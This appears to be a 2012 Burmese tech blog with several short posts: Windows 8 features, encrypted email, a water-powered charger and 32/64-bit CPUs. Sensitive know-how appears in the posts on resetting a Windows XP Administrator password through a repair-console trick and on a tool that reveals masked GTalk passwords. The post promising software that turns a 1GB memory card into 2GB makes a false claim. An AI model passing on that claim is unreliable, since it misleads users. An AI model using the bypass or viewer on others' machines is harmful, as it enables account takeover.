ထို႔ေၾကာင့္ ထိုစဥ္ကထြက္ရွိခဲ့ေသာ All-in-on PC မ်ားျဖင့္သာ အသံုးျပဳခဲ့ၾကရသည္။

Touch ႀကီးစိုးရာနယ္ေျမသည္ Tablet ႏွင့္ Smart phone မ်ားျဖစ္ပါသည္။

ထို႔ေၾကာင့္ Windows 8ထုတ္လုပ္မည္ဟုဆိုသည့္အခါ Touch ႀကီးစိုးရာ ပစၥည္းမ်ားေပၚ၌ အလြယ္တကူသံုးစြဲႏုိင္ေရးကို စဥ္းစားလာရပါသည္။

Touch သံုးစြဲႏုိင္သည့္ ပစၥည္းမရွိေသးသူျဖစ္ပါက Windows 8ကို၀ယ္ယူရင္း Hardware အသစ္၀ယ္ယူေရးကို စဥ္းစားေကာင္း စဥ္းစားရပါမည္။

သို႔ေသာ္ OS အသစ္သည္ သမာ႐ိုးက် Keyboard ႏွင့္ Mouse ကို အေထာက္အပံ့ျပဳမည္ျဖစ္ရာ ကြန္ပ်ဴတာအေဟာင္းသံုးသူမ်ား ပစၥည္းအသစ္မ၀ယ္ဘဲ အဆင္ေျပႏုိင္ပါသည္။

Touch Screen ပါသည့္ Tablet သံုးသူမ်ားအေနျဖင့္လည္း Keyboard ႏွင့္ Mouse ၏ပံ့ပိုးမႈကိုပါ တြဲဖက္ရရွိမည္ျဖစ္ရာ ကြန္ပ်ဴတာသံုးစြဲမႈတြင္ ပို၍ျပည့္စံုလာစရာ အေၾကာင္းရွိပါသည္။

Metro user interface ျဖင့္ လာမည့္ Windows 8
Metro user interface သည္ Windows 8 အတြက္ အသစ္ျပင္ဆင္ေရးဆြဲေပးထားေသာ
အရာ ျဖစ္ပါသည္။

Windwos Phone 7 သံုးစြဲသူတို႔အေနျဖင့္မူ ဤ interface ျဖင့္ ယဥ္ပါးၿပီး ျဖစ္ေကာင္းျဖစ္ ႏုိင္ပါသည္။

Windows 8 အသံုးျပဳသူသည္ ကြန္ပ်ဴတာဖြင့္လိုက္သည့္အခါ ယခင္ကလို Windows Logoျဖင့္ Start button ကို ေတြ႕ရမည္မဟုတ္ပါ။

Live tile ဟုေခၚေသာ အကြက္ငယ္မ်ားျဖင့္ ဖြဲ႕စည္း ထားသည့္ ေလးေထာင့္ကြက္ႀကီးကို ေတြ႕ရပါမည္။

Live tile အကြက္ငယ္မ်ားတြင္ ျပထားေသာ icon မ်ားသည္ Desktop ေပၚရွိ icon မ်ားကဲ့သို႔ပင္
ျဖစ္ပါသည္။

အဆိုပါ ေနရာမွေန၍ သက္ဆုိင္ရာ Application ကို တိုက္႐ိုက္ဖြင့္ႏုိင္ပါသည္။

သို႔ေသာ္ Live tile က desktop icon ထက္အားသာခ်က္မွာ ယင္းကိုဖြင့္ၾကည့္ရန္မလိုဘဲ mouse
ျဖတ္တင္႐ံုျဖင့္ Information ရႏုိင္သည့္ကိစၥျဖစ္ပါသည္။

အင္တာနက္ခ်ိတ္ဆက္ထားမည္ဟုဆိုလွ်င္ mail application ေပၚ mouse ျဖတ္တင္ပါက အီးေမးလ္အသစ္ မည္မွ်၀င္ေနသည္ မည္သူ႔ထံမွလာသည္ စသည္တို႔ကို သိႏုိင္ပါသည္။

မိုးေလ၀သအေျခအေနဆိုလွ်င္လည္း အင္တာနက္ခ်ိတ္ထားပါက သက္ဆုိင္ရာ Live tile သည္လက္ရွိအေျခအေနကို ေဖာ္ျပႏုိင္ပါသည္။

ယင္း Interface သည္ နားလည္ရလြယ္သလို အသံုးျပဳရလည္း လြယ္ပါသည္။

Touch screen ျဖင့္ ပို၍အဆင္ေျပပါသည္။

သို႔ေသာ္ mouse ျဖင့္လည္း သံုးႏုိင္ပါသည္။

Touch ျဖင့္ျဖစ္ေစ၊ mouse ျဖင့္ျဖစ္ေစ close application, access menu အပါအ၀င္ လုပ္ငန္းေပါင္း
မ်ားစြာကို လုပ္ေပးႏုိင္ပါသည္။

Application store ကို ေခၚေဆာင္လာမည့္ Windows 8
သာမန္သံုးစြဲသူတို႔အတြက္ Windwos 8သည္ Windows RT (Windows Run Time) ႏွင့္ Windows Pro ဟူ၍ အမ်ိဳးအစားႏွစ္မ်ိဳးခြဲ၍ ထြက္ရွိမည္ျဖစ္ပါသည္။

ယင္းအေပၚမူတည္၍ Application သံုးစြဲပံု၊ သံုးစြဲနည္းကြဲျပားသြားပါသည္။ RT သည္ ယခင္ Desktop application အေဟာင္းမ်ားကိုမူ တစ္ပါတည္းထည့္သြင္းေပးလိုက္မည္ျဖစ္၍သာ သံုးစြဲႏုိင္ျခင္းျဖစ္ပါသည္။

ထို႔ေၾကာင့္ RT သံုးစြဲသူတို႔သည္ အသစ္ေပၚေပါက္လာမည့္ Windows Store မွေန၍ application အေဟာင္းမ်ားကို ဆက္လက္သံုးစြဲႏုိင္ပါသည္။

သို႔ေသာ္ Metro Interface တြင္ ထည့္၍သံုးစြဲလိုသည့္ application မ်ားကို store မွေန၍ ၀ယ္ယူ
ရပါလိမ့္မည္။

ကြန္ပ်ဴတာေပၚမွေန၍ အင္တာနက္ခ်ိတ္ဆက္ၿပီး Windows store မွ application မ်ားကို browse လုပ္ႏုိင္သည္။ Download လုပ္ႏုိင္သည္ Install တင္ႏုိင္သည္။

ေလာေလာဆယ္ Application အေရအတြက္ အကန္႔အသတ္ရွိေနေသာ္လည္း Windows 8 အၿပီးသတ္ထြက္သည့္အခါ အေရအတြက္မ်ားျပားလာပါမည္။

Application အမ်ားစု (ဥပမာ - Maps) သည္ full screen ျဖင့္ ၾကည့္ႏုိင္ပါမည္။

ေနရာေဒသတစ္ခုကိုရွာရန္၊ တစ္နရာသို႔သြားႏုိင္မည့္ လမ္းေၾကာင္းရွာရန္ ကိစၥတို႔အတြက္ Big Map ကိုအသံုးျပဳပါသည္။

သို႔ေသာ္ Windows 8RT တြင္ေရာ Pro တြင္ပါ People, Calendar, Photo, Music, Messaging ႏွင့္ Video ဟူေသာ Metro application မ်ားအသင့္ပါလာပါမည္။

Cloud service ကို အေထာက္အပံ့ေပးမည့္ Windows 8
Windows 8 သည္ Cloud ကိုအသံုးျပဳရန္လည္း ဦးတည္ခ်က္ထားသည္။

ယင္းသည္လူအမ်ားႏွစ္ၿခိဳက္မည့္ feature တစ္ခုလည္း ျဖစ္ႏုိင္ပါသည္။

အင္တာနက္ခ်ိတ္ဆက္ထားမည္ဟုဆိုလွ်င္ Microsoft Store သည္ ကြန္ပ်ဴတာသံုးစြဲသူ၏ setting မ်ားကို Cloud ထဲတြင္ သိမ္းဆည္းေပးပါမည္။

ထို႔ေၾကာင့္ အင္တာနက္ခ်ိတ္ထားေသာ Windows 8 ကြန္ပ်ဴတာကိုဖြင့္သံုးသည့္အခါယခင္က
ျမင္ေတြ႔သည့္ အတုိင္း လုပ္ေနက်အတိုင္း ရွိပါလိမ့္မည္။

Cloud ျဖင့္ေဆာင္ရြက္ေပးမည့္ Microsoft ၏လုပ္ငန္းစဥ္မ်ားတြင္ Gmail ထဲမွေန၍ အသံုးျပဳသူ၏အီးေမးလ္မ်ားကို ဆြဲယူေပးျခင္း၊ facebook ေပၚတင္ထားသမွ် ဓာတ္ပံုအားလံုးကို တစ္ေနရာတည္းမွ ၾကည့္႐ႈႏုိင္ေစျခင္း စသည္တို႔ပါ၀င္လာပါမည္။

Screen ကို Lock ခ်ႏုိင္ၿပီး ဓာတ္ပံုျဖင့္ Password ေပးႏုိင္မည့္ Windows 8
စမတ္ဖုန္းသံုးစြဲသူတို႔အတြက္မူ lock screen ကို အသားက်ၿပီးျဖစ္ေနပါလိမ့္မည္။

ဖုန္းသံုးလိုလွ်င္ lock ကိုျဖည္ေပးရမည္။ Password သံုးၿပီး lock လုပ္ထားလွ်င္ password ျဖည့္ထည့္ေပးဖို႔လည္း လိုပါမည္။

Windows 8တြင္လည္း စမတ္ဖုန္းမွာကဲ့သို႔ picture lock screen ကိုအသံုးျပဳႏုိင္ပါမည္။

Lock ကိုျဖည့္ရန္အတြက္ လက္ေရႊ႕လ်ားမႈပံုစံသံုးမ်ိဳးကို လုပ္ရန္လိုပါသည္။

အဆိုပါေရြ႕လ်ားမႈတို႔ကို straight lines, circles ႏွင့္ taps မ်ားထဲမွ ေရြးခ်ယ္ႏုိင္ပါသည္။

Lock screen ကိုလည္း မိမိ၏ ဓာတ္ပံု၊ အခ်ိန္၊ နာရီ၊ ရက္စြဲ၊ application notification စသည့္ အရာတစ္ခုခုျဖင့္ စိတ္ႀကိဳက္ဖန္တီးႏုိင္ပါသည္။

ပစၥည္းကိရိယာအမ်ိဳးအစား စံုလင္စြာအသံုးျပဳႏုိင္ေစမည့္ Windows 8
Windows 8ကို PC ေပၚတြင္သာမဟုတ္ အျခားေသာ ပစၥည္းအေတာ္မ်ားမ်ားေပၚတြင္ အသံုးျပဳႏုိင္ရန္လည္း ဒီဇိုင္းဆြဲထားပါသည္။

(၂၇) လက္မျမင္ကြင္းရွိေသာ PC ျဖစ္ေစ၊ (၁၅) လက္မျမင္ကြင္းရွိေသာ Notebook ျဖစ္ေစ၊ (၁၀) လက္မျမင္ကြင္းရွိေသာ Tablet ျဖစ္ေစ Windows 8သည္ အမွားအယြင္းမရွိ အလုပ္လုပ္ေပးပါလိမ့္မယ္။

Metro interface သည္ ပံုေဖာ္မ်က္ႏွာျပင္အရြယ္အစားႏွင့္ resolution အမ်ိဳးမ်ိဳးေပၚတြင္ အဆင္ေျပစြာ ခ်ိန္ညႇိလုပ္ေဆာင္ႏုိင္ရန္ ဒီဇုိင္းလုပ္ထားပါသည္။

ကြန္ပ်ဴတာအႀကီးအေသးေပါင္းစံုေပၚတြင္ တသမတ္တည္ၿငိမ္မႈျဖင့္ အလုပ္လုပ္လိုသည္ဟုဆိုလွ်င္ Windows 8သည္ အလြန္တရာ ေရြးခ်ယ္သင့္ေသာ အရာျဖစ္ပါသည္။

ေဆာ့ဖ္၀ဲအေဟာင္းမ်ားႏွင့္ တြဲ၍သံုးႏုိင္ေစမည့္ Windows 8
OS တစ္ခု၏ အသြင္အျပင္ႏွင့္ တည္ေဆာက္ပံုသည္ အလြန္တရာေျပာင္းလဲသြားသည့္အခါ ယခင္ကအသံုးျပဳခဲ့ေသာ ေဆာ့ဖ္၀ဲအေဟာင္းမ်ားႏွင့္တြဲဖက္၍ ရမွရပါေတာ့မည္လားဟု စိုးရိမ္ဖြယ္ရွိလာပါသည္။

Windows Vista ထြက္သည့္အခါ XP ႏွင့္တြဲသံုးႏုိင္သည့္ ေဆာ့ဖ္၀ဲအခ်ိဳ႕ အလဟသျဖစ္ခဲ့ရသည္ မဟုတ္ပါလား။

သို႔ေသာ္ ဤတစ္ႀကိမ္တြင္ ကံေကာင္းသည္မွာ Windows 7 တြင္ တြဲဖက္သံုးႏုိင္ေသာ application အားလံုး Windows 8တြင္ သံုး၍ရမည့္ကိစၥျဖစ္ပါသည္။

Microsoft သည္ Metro interface ကိုပြဲထုတ္ခဲ့ေသာ္လည္း ယင္း၏ေအာက္တြင္ ယခင္ျမင္ေတြ႕ေနက် desktop ရွိေနၿပီး ယခင္ application အေဟာင္းမ်ားကို (Install တင္ထားခဲ့လွ်င္) ေခၚယူသံုးစြဲႏုိင္ပါမည္။

Windows 8RT ကမူ Metro application မ်ားကို သီးျခား၀ယ္ယူသံုးစြဲႏုိင္ပါမည္။

Pro တြင္မူ application အေဟာင္းမ်ားကို တင္၍သံုးႏုိင္သလို Metro application အသစ္မ်ားကို ၀ယ္ယူသံုးစြဲႏုိင္ပါသည္။

ထို႔ေၾကာင့္သံုးစြဲသူအေနျဖင့္ Application နယ္ပယ္ႏွစ္မ်ိဳးလံုးကို တျဖည္းျဖည္းယဥ္ပါးသြားပါလိမ့္မည္။

Task and file management အသစ္ကို ယူေဆာင္လာမည့္ Windows 8
Windows 8တြင္ Task ႏွင့္ file မ်ား ကိုင္တြယ္ေဆာင္ရြက္ရာတြင္ အလွည့္အေျပာင္းလုပ္ႏုိင္မည့္ ကိစၥအခ်ိဳ႕ပါ၀င္လာပါသည္။

Multiple file operation တုိ႔ကို Windows တစ္ခုတည္းတြင္ ခိုင္းေစႏုိင္ပါမည္။ ဖုိင္လုပ္ငန္းတစ္ခုစီကိုခြဲ၍ pause ႏွင့္ cancel လုပ္ႏုိင္ခြင့္ရွိပါမည္။

file လႊဲေျပာင္းမႈ အျမန္ႏႈန္းကိုေဖာ္ျပေပးမည့္ real-time graph တစ္ခုလည္း ပါ၀င္လာပါမည္။

Task management အတြက္မူ application ႏွင့္ background process ဟူ၍ အပိုင္းႏွစ္ပိုင္းခြဲၿပီး အလုပ္လုပ္ပါမည္။

Application History ဟုေခၚေသာ အပိုင္းႏွစ္ပိုင္းခြဲၿပီး အလုပ္လုပ္ပါမည္။

Application History ဟုေခၚေသာ Tab အသစ္တစ္ခုလည္း ပါ၀င္လာပါတယ္။

ယင္းထဲတြင္ Metred Network section ကိုေတြ႕ရမည္ျဖစ္ၿပီး မည္သည့္ Application က data အမ်ားစုအား ကိုင္တြယ္ေဆာင္ရြက္ေနသည္ကို ၾကည့္႐ႈႏုိင္ပါသည္။

ေရးသားသူ -ဧဧသက္ (ၿဖိဳးဓန ဒစ္ဂ်စ္တယ္ဓါတ္ပံု)

Tuesday, August 14, 2012

passwordျဖင္႕ပိတ္ျပီးEmaiပိုရေအာင္

passwordျဖင္႕ပိတ္ျပီးEmaiပိုရေအာင္
Gmail, Email စာေတြဓာတ္ပံုေတြကို ပတ္စေ၀ါ့နဲ႕ပိတ္ထားျပီးတျခားလူၾကည့္မရေအာင္ပိတ္မည္..

ႏိုင္ငံျခားမွာေတ့ာ အေရးၾကီးတဲ့ ဘဏ္အေကာက္ေတြ ေနာက္ျပီးေတာ့ ကိုယ္ေရးကိုယ္တာနဲ႕

သက္ဆိုင္တဲ့လ်ိဳ႕၀ွက္သတင္းေတြကို တစ္ေယာက္နဲ႕တစ္ေယာက္ပို႕တဲ့အခါမွာ အသံုးျပဳၾကရတယ္

အရင္ဆုံးေလ့လာရန္အတြက္...

http://www.lockbin.com/lockbin.php လိပ္စာသို႕သြားပါ..Your name မွာ မိမိနာမည္ကိုရိုက္ထည့္မည္...

Your Email မွာ မိမိ အီးေမး္လ္လိပ္စာကိုရိုက္ထည့္မည္..

Recipient email မွာေတာ့ ကိုပို႕လိုတဲ့လူရဲ႕အီးေမးလိပ္စာကိုရိုက္မည္.
.

Secret password မွာ မိမိသတ္မွတ္လို႕တဲ့ လိ်ိဳ႕၀ွက္ဂဏန္းကိုရိုက္ထည့္မည္.

Confirm password မွာ secret password မွာရိုက္ထားတဲ့ လိ်ိဳ႕၀ွက္ဂဏန္းကိုရိုက္ထည့္မည္.

subject မွာ မိမိပို႕မယ့္အေၾကာင္းအရာေခါင္းစဥ္ကိုရိုက္မည္..

message box မွာေျပာလိုတာကိုရိုက္ျပီး

photo သို႕မဟုတ္ သီခ်င္း ပါတြဲပို႕လိုလွ်င္ upload ကိုႏွိပ္ႏိုင္ပါတယ္အဲေနာက္

i accept the term and condition ကိုအမွန္ျခစ္ေလးေပးျပီး submit ကိုႏွိပ္လိုက္ပါ..

.ပို႕ျခင္းလုပ္ငန္းျပီးဆုံးသြားပါျပီး

ကီးကီး

Monday, August 13, 2012

ဖုန္းဘက္ထရီကို ေရနဲ႔ အားသြင္းလို႔ ရၿပီ


အားသြင္းလို႔ရတဲ့ ဘက္ထရီ အေတာ္မ်ားမ်ားကို ေရနဲ႔ အားသြင္းလို႔ ရၿပီဆိုရင္ သင္ လက္ခံႏုိင္ပါ့မလား။ ဒါဟာ တကယ့္ကို ျဖစ္ႏုိင္ေနပါၿပီ။ ဆြီဒင္ အေျခစိုက္ ကုမၸဏီတစ္ခုမွ ယခင္ႏွစ္ကုန္ပိုင္းတြင္ အာစီလိုနားတြင္ က်င္းပခဲ့ေသာ ကမာၻ႔မိုဘိုင္း ညီလာခံတြင္ မိတ္ဆက္ျပသခဲ့ၿပီး ျဖစ္သည္။ ယင္းအားသြင္းစက္သည္ ခြက္အငယ္စားႏွစ္ခု ပူးတြဲပါရွိတဲ့ ပံုစံျဖစ္ၿပီး လိုရာကို အလြယ္တကူ သယ္ယူသြားႏုိင္သည့္ အရြယ္အစားျဖစ္ပါသည္။ ေရကို ခြက္တစ္ခုထဲတြင္ ထည့္သြင္းေပးလိုက္႐ံုျဖင့္ Sodium Silicide ႏွင့္ ဓာတ္ျပဳကာ ဟိုက္ဒ႐ိုဂ်င္ဂက္စ္ ထြက္ရွိလာၿပီး အားသြင္းႏိုင္မည္ျဖစ္သည္။ စားပြဲတင္ဇြန္း တစ္ဇြန္းစာ ေရျဖည့္ အသံုးျပဳ႐ံုျဖင့္ ဖုန္းဘက္ထရီကို ၁၀ နာရီစာ အသံုးျပဳႏိုင္သည့္ အားျဖည့္သြင္းေပးႏုိင္တယ္လို႔လည္း သိရွိရပါသည္။ USB ႀကိဳးျဖင့္ ခ်ိတ္ဆက္အားသြင္းရေသာ လွ်ပ္စစ္ပစၥည္းတုိင္းကို အလြယ္တကူ အားသြင္းေပးႏုိင္ပါသည္။ ေမလ ဇြန္လေလာက္ ကတည္းက ေစ်းကြက္အတြင္း ေရာက္ရွိေနၿပီး ေရာင္းေစ်းမွာ ေဒၚလာ ၂၀၀ ႏွင့္ ၂၅၀ ၾကား သတ္မွတ္ထားပါသည္။ ေအာက္ခံခြက္ကိုေတာ့ ၄ ေဒၚလာျဖင့္ လဲလွယ္ အသံုးျပဳႏိုင္ပါသည္။ ဒီ အံ့ၾသဖြယ္ရာ ပစၥည္းကိုေတာ့ PowerTrekk လို႔ နာမည္ေပးထားပါတယ္။





“On the one hand, mobile devices release us from being tethered to one place. For instance, one no longer needs to be connected to a modem to browse the web, thanks to smartphones that are Wi-Fi enabled.

On the other, such mobility is of no use if one does not have mobile facilities for charging the devices. Mobile chargers are common, but what if you were on a trek through the Amazon and the battery in your device ran out of charge?



If you are willing to pay around $300 (£200), you may not have to worry about the lack of charging facilities close at hand. The solution, named Powertrekk, uses fuel cell technology to convert hydrogen gas into electricity. Best of all, all you need is water, from which this clever gadget extracts hydrogen. Simply insert a PowerPukk fuel pack and add water.



The Powertrekk is designed for USB-powered devices, which means both your mobile phone and laptop (if you’re carrying one on a trek) can be charged. And yes, they’re safe for you to carry with you on board flights.Powertrekk Power from Water1 636x557 Charge Your Mobile With Water, the Powertrekk!



The chemical process is safe and eco-friendly. Water vapour is produced as a by-product, which is why the fuel cell must be exposed to open air. This technology also removes the dependence that solar powered chargers have on the weather. During heavy rains, you can’t rely on your solar charger, but the Powertrekk will still work.

Like all other electronic devices, used fuel packs and cell chargers constitute electronic waste and need to be disposed of under a controlled recycling program.”







Sunday, August 12, 2012

Memory card 1GB ကေန 2GB ေျပာင္းမယ္


ကဲ.....ဒီတစ္ခါေတာ႔ ေတးသီငွက္ ခ်စ္ပိရိသတ္အတြက္ ေဆာ႔ပ္၀ဲလ္တစ္ခုကို တစ္ကယ္စမ္းသပ္ေအာင္ၿမင္လုိ့တင္ေပးလုိက္တာပါ။ Micros SD Card 1 GB ကေန 2 GB ေၿပာင္းလုိ ့ရတယ္ေဆာ့္၀ဲေလးပါ။လုပ္ရတာခက္ခဲတာတစ္ခုမွမရွိပါဘူး။အရမ္းကိုလြယ္ကူပါတယ္။
လုပ္နည္းက Driver နာမည္ကိုေရြးေပးပါ။ၿပီးရင္ေတာ့Convert ကိုႏွိပ္လိုက္ပါ။
ၿပီးရင္ကဒ္ကုိကြန္ပ်ဴတာထဲကေနအၿပီးၿဖဳတ္လုိက္ပါ။ၿပီးရင္ၿပန္တပ္လုိက္ပါက1 GB မွ 2 GB ေၿပာင္းသြားမွာကိုေတြ ့၇မွာၿဖစ္ပါတယ္။


ေဆာ႔ပ္၀ဲလ္ေဒါင္းရန္ -------------> ဤေနရာကိုႏွိပ္၍ ေဆာ႔ပ္၀ဲလ္ရယူပါ.........!


Monday, July 30, 2012

Windows Administrator Account password change သြားမယ္ ဆိုရင္

Windows XP တင္လိုက္တာနဲ႔ Built-In Account ၂ ခု ပါလာတာ ေတာ္ေတာ္မ်ားမ်ားလည္း သိၾက မွာပါ။
၁။ Administrator နဲ႔
၂။ Guest ဆိုၿပီး ပါလာပါတယ္။
Administrator က Windows တစ္ခုလံုးကို ႀကိဳက္သလို လုပ္ပိုင္ခြင့္ရွိပါတယ္။ Full Access Permission ေပါ့။ ႀကိဳက္တဲ့Software တင္ လို႔ရတယ္။ ျဖဳတ္လို႔ရတယ္။ Group Policy ေတြ Registry ေတြ ျပင္လို႔ရတယ္။ Account ေတြ ထပ္ဖြင့္လို႔ရတယ္။ ဖ်က္ခ်င္တဲ့ Account ေတြ ဖ်က္လို႔ရတယ္။ Account ေတြရဲ႕Password ေတြ ကို Change လို႔ရတယ္။
Guess ကေတာ့ Windows ကို၀င္သံုးရံုသက္သက္ပါ။ ဘာမွလုပ္ပိုင္ခြင့္မရွိပါဘူး။
Administrator က ထပ္ဖြင့္တဲ့ Account ေတြမွာလည္း Account Type 2 မ်ိဳး ရွိပါတယ္။

၁။ Administrator Type နဲ႔
၂။ Limited Type ပါ။
Account ထပ္ ဖြင့္တဲ့အခါ Account name ေပးၿပီးရင္ Account Type ကို ေရြးေပးရပါမယ္။ Administrator type နဲ႔ ဖြင့္လိုက္ရင္ Built-In Administrator အတိုင္း လုပ္ပိုင္ခြင့္ရွိပါတယ္။ Limited type နဲ႔ ဖြင့္လိုက္ရင္ ေတာ့ ဘာမွ လုပ္ပိုင္ခြင့္ မရွိပါဘူး။ ဖြင့္လိုက္တဲ့ account ရဲ႕ Password ကို ဘဲ change ခြင့္ရွိပါတယ္။ အဲဒီေတာ့ Administrator ဆိုတာ အေရးႀကီးပါတယ္။ Administrator Account ကို Password မေပးထားဘူးဆိုရင္ ကိုယ့္ Computer ရဲ႕ Windows ထဲ ကို တျခားသူက အလြယ္တကူ ၀င္ေရာက္ၿပီး ႀကိဳက္သလို ေမႊသြားလို႔ရပါတယ္။ Registry ေတြ ကလိ သြားမယ္။ ၿပီးရင္ password လည္း change သြားမယ္ ဆိုရင္ ဘယ္လိုလုပ္ၾကမလဲ၊ ၀င္လို႔ရေတာ့ မွာမဟုတ္ပါ။ အဲဒီေတာ့ Administrator Account ကို Password ေပးထားရပါတယ္။

ကိုယ္ေပးထားတဲ့ Password ကို ကိုယ္ ကိုယ္တိုင္ ေမ့သြားခဲ့ရင္ ေရာ၊ Windows ထဲကို ၀င္လို႔ရေတာ့မွာ မဟုတ္သလို၊ Limited Account နဲ႔ ၀င္လို႔ရခဲ့ရင္လည္း ကိုယ္သံုးခ်င္တဲ့ Program ေတြ Install လုပ္ခြင့္ရမွာမဟုတ္ပါဘူး။ အဲဒီလို Case ေတြကို ေျဖရွင္းဖို႔အတြက္ နည္းလမ္းေတြကေတာ့ အမ်ားႀကီးရွိပါတယ္။ Password Recovery CD ေတြရွိေတာ့ရွိပါတယ္၊ ဒါေပမယ့္ ၀ယ္ရတာ၊ သံုးရတာ အခက္အခဲရွိပါလိမ့္မယ္။ အလြယ္ကူဆံုး နည္းလမ္းကေတာ့ Windows XP CD နဲ႔ Password ျပန္ change တဲ့နည္းပါ။ ဒီနည္းကို သိတဲ့သူေတြ သိပ္မရွိပါဘူး။
အရင္ဆံုး XP CD နဲ႔ Boot တက္လိုက္ပါ။ Boot တက္ ၿပီးလို႔ Windows Install လုပ္မွာလား၊ Repair လုပ္မွာလားေမးတဲ့ အဆင့္ေရာက္ရင္ Enter ေခါက္ၿပီး ဆက္သြားလိုက္ပါ။ License Agreement ကို F8 ႏွိပ္ၿပီး Agree လုပ္လိုက္ပါ။ ေနာက္တစ္ေခါက္ Windows တင္ၿပီးသားရွိတယ္၊ အသစ္တင္မွာလား Repair လုပ္မွာလား ထပ္ေမးရင္ R ကို ႏွိပ္လိုက္ပါ။ လိုအပ္တဲ့ File ေတြ Copy ကူးၿပီး Restart က်သြားပါမယ္။ ျပန္တက္လာရင္ ဆက္ Install လုပ္ေနပါလိမ့္မယ္။

ဘယ္ဘက္ေအာက္ေျခ က Loading ဘား တန္းေအာက္မွာ Hardware Installation ဆိုတဲ့စာကိုေတြ႕ရင္ Shift + F10 ကိုႏွိပ္လိုက္ပါ။ command prompt ေပၚလာပါလိမ့္မယ္။ nusrmgr.cpl ကိုရိုက္ၿပီး Enter ေခါက္လိုက္ပါ။ User Account Box ေပၚလာရင္ Administrator ကိုႏွိပ္လိုက္ပါ။ ၿပီးရင္ Change Password ကို ထပ္ႏွိပ္လိုက္ပါ။ ၿပီးရင္ေတာ့ ကိုယ္ေပးခ်င္တဲ့ Password ကို ျပန္ေပးလိုက္ပါ။ အားလံုးၿပီးရင္ Exit နဲ႔ထြက္လိုက္ပါ။ Windows Repair ကိုၿပီးတဲ့အထိ ဆက္သြားလိုက္ရင္ ရပါၿပီ။ Windows, Program နဲ႔ Data ေတြ ပံုမပ်က္ ရွိေနပါလိမ့္မယ္။ အဲ တစ္ခုေတာ့ရွိတယ္ဗ်။ ကိုယ္တင္ထားတဲ့ Windows ရဲ႕ Service Pack နဲ႔ ကိုယ္ တင္မယ့္ ကေတာ့ XP CD ရဲ႕ Service PackSame ျဖစ္မွရမွာေနာ္။
အားလံုး အဆင္ေျပပါေစဗ်ာ....

Saturday, July 28, 2012

GTalk password ကို ျမင္ေအာင္ႀကည့္မယ္ Software

အရင္ ဒီမွာ password-viewer.zipေဒါင္းလိုက္ပါအုန္း..။ ဖိုင္းဆိုဒ္ေလး နည္းနည္းေလးပါ..။

ျပီးတာနဲ ရလာတဲ့ေဆာ့၀ဲေလးကို နွစ္ခ်က္ ကလစ္လိုက္တာနဲ ..

အဲ ေဆာ့၀ဲေလးကို ဖြင့္တာနဲ ေအာက္က password viewer ဆိုတာေလးနဲ မိမိ pass အမဲစက္ေလးအေပၚေထာက္ျပီး

လက္၀ါးပံဳစံေလးကိုနိတ္လိုက္တာနဲ အျပာကြင္းေလးနဲ ၀ိုက္ျပထားတဲ့ေနရာမွာ မိမိေရးလိုက္တဲ့ pass ႀကည့္နိုင္တာေပါ့..။

ေနမင္းေတာ့ pas ကို 123456789 လိုရိုက္ထားတယ္သိလား အဲမွာလဲ 123456789 လိုေပါေနတယ္သိလား..။

ဘာရယ္မဟုက္ပါဘူး သိသြားတာေပါ့..။



Friday, July 27, 2012

System 32 BIT / 64BIT ဆိုတာဟာ???


CPU ဆုိတာနဲ႕ အၾကမ္းအားျဖင့္databus(dataေတြကုိသယ္ႏုိင္တဲ့လမ္းေၾကာင္း)နဲ႕ width (ေဒတာကုိသယ္ႏု္ိင္တဲ့ လမ္းေၾကာင္းရဲ႕ ပမာဏ) တုိ႔နဲ႕တုိင္းတာပါတယ္။ ထုိ data bus မွာလဲ Intertnal data bus နဲ႕ external data bus ဆုိျပီးႏွစ္မ်ဳိးရွိပါတယ္..internal data bus ရဲ႕ တစ္ႀကိမ္မွာ သယ္ႏုိင္တဲ့ႏႈန္းကုိ bit နဲ႕တုိင္းတာပါတယ္။ 32 bit ထက္စာရင္ 64bit က ပုိျမန္မွာ ပါ။တစ္ခါ external data bus ကုိေတာ့ အမ်ားသိတဲ့အတုိင္း front sidebusလုိ႕ေခၚ ပါတယ္။

ယေန႕အသုံးျပဳေနတဲ့ကြန္ပ်ဴတာတုိင္းကexternal databus ကုိ 64 bit နဲ႕အလုပ္လုပ္ပါတယ္။ တစ္နညး္အားျဖင့္ prosser နဲ႕ memory chpiset ( north gate) ေတြဟာ data ေတြကုိ အျပန္ အလွန္ 64 bit စီ One cycle per clock ကုိသယ္ေဆာင္ႏုိင္က်ပါတယ္ အဲဒီလုိ64bitနဲ႕အလုပ္အ လုပ္ေသာ္ လည္း တစ္ကယ္ 64 bit processor မဟုတ္ပါ ဘူး။external databus (cpuနဲ႕ memory chipset ၾကား) 64 bit နဲ႕ အလုုပ္မလုပ္ေပမယ့္သူက Internal data bus (cpu ထဲမွာ အလုပ္္လုပ္) တာက်ေတာ့32 bit ပဲအလုပ္လုပ္ပါတယ္။

ဟုိအရင္ 386 မွ Pentium4 ထ ိprocessor ေတြက 64 bit processor မဟုတ္ပါဘူး။ အျပင္ပန္းက 64 bit အလုပ္လုပ္ေပမယ္.့အထဲမွာေတာ ့32 bit ပဲအလုပ္လုပ္ပါတယ္..intel itenium/EM64T /AMD (Opteron)နဲ႕ Athelon 64 စတဲ့ေနာက္ပိုင္း processor ေတြသာလ်င္ 64 bit processo r ျဖစ္ၾကပါတယ္ ။..64bit propessor ကို 64bit operating system နဲ႕သုံးမွ သာစြမ္းေဆာင္ ရည္အျပည့္ရမွမုိ႕လုိ႕ 64 bit OS ေတြပါထုတ္လုပ္လာၾက ပါတယ္..64 bit processor မွာ 64 bit Architecture ႏွစ္မ်ိဳးရွိပါတယ္.. ………ပထမတစ္မ်ဳိးကေတာ့ 64 bit processor ရယ္လုိ႕႔ ပထမဆုံးတြက္ေပၚလာတဲ့ intel ရဲ႕ Itanium processor architecture ပါ…… (IA64) Itanium 64 လု႕ိ႕ လဲေခၚပါတယ္…..အဲဒ ီIAT64 မွာလက္ရွိ 32 bit processor မ်ားအသုံးျပဳေနေသာ x86 instruction set နဲ႕ compatible မျဖစ္တဲ႕ EPIC ဆုိတဲ႕ instruction set ကုိသုံးထားပါတယ္……

